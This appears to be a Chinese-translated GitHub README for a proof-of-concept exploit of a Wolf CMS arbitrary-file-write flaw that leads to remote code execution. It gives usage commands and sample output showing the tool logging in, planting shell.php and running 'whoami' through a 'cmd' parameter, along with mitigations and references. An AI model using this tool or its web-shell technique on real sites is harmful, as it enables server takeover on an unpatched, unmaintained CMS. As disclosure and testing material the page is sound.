anirbala98/CVE-2026-67206

GitHub: anirbala98/CVE-2026-67206

针对 Wolf CMS 任意文件写入导致 RCE 漏洞(CVE-2026-67206)的概念验证漏洞利用工具。

Stars: 1 | Forks: 0

# CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - 通过任意文件写入实现 RCE 此仓库包含针对 CVE-2026-67206 的概念验证(PoC)漏洞利用代码。 ## 免责声明 本项目仅供教育目的和授权安全测试使用。请勿将其用于您不拥有或未经授权测试的系统。 ## 概述 Wolf CMS 0.8.3.1 及之前版本中存在一个任意文件写入漏洞。它允许经过身份验证的攻击者通过 `FileManagerController.php` 的 `create_file()` 和 `save()` 函数,将恶意的任意文件写入 Web 根目录的 `/public` 目录中。`FileManagerController.php` 的 `create_file()` 函数未对文件扩展名进行验证,从而允许经过身份验证的攻击者写入恶意 PHP 脚本并获得远程代码执行权限。 ## 受影响版本 Wolf CMS 0.8.3.1 及之前的所有版本均受到影响。Wolf CMS 仓库已于 2021 年 8 月 28 日被归档,且不再积极维护。目前没有针对此漏洞的补丁。 ## 环境要求 - Python 3.13.14 - Requests 2.32.5 - Beautifulsoup4 4.15.0 ## 安装说明 ``` git clone https://github.com/anirbala98/CVE-2026-67206.git cd CVE-2026-67206/ pip install -r requirements.txt ``` ## 使用说明 ``` python exploit.py -u -p python exploit.py http://127.0.0.1:8080/ -u admin -p admin ``` ## 示例 ``` └─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K [*] Logging in with provided credentials... [+] Login successful [*] Creating a file named shell.php... [+] File creation successful [*] Attempting to write payload to shell.php... [+] Payload written successfully! [+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php [+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami www-data ``` ## 缓解措施 - 基于白名单验证经过身份验证的用户创建的文件扩展名 - 禁止 `.php`、`.phtml`、`.phar`、`.php5` 等扩展名,除非确有必要 - 禁止在 Web 服务器根目录的上传目录中执行 PHP - 如果可能,将创建的文件保存在其他服务器上,以最大程度减少影响 ## 参考资料 - https://www.tenable.com/cve/CVE-2026-67206 - https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
标签:PoC, Python, Web安全, 威胁模拟, 字符串匹配, 安全, 无后门, 暴力破解, 蓝队分析, 超时处理, 逆向工具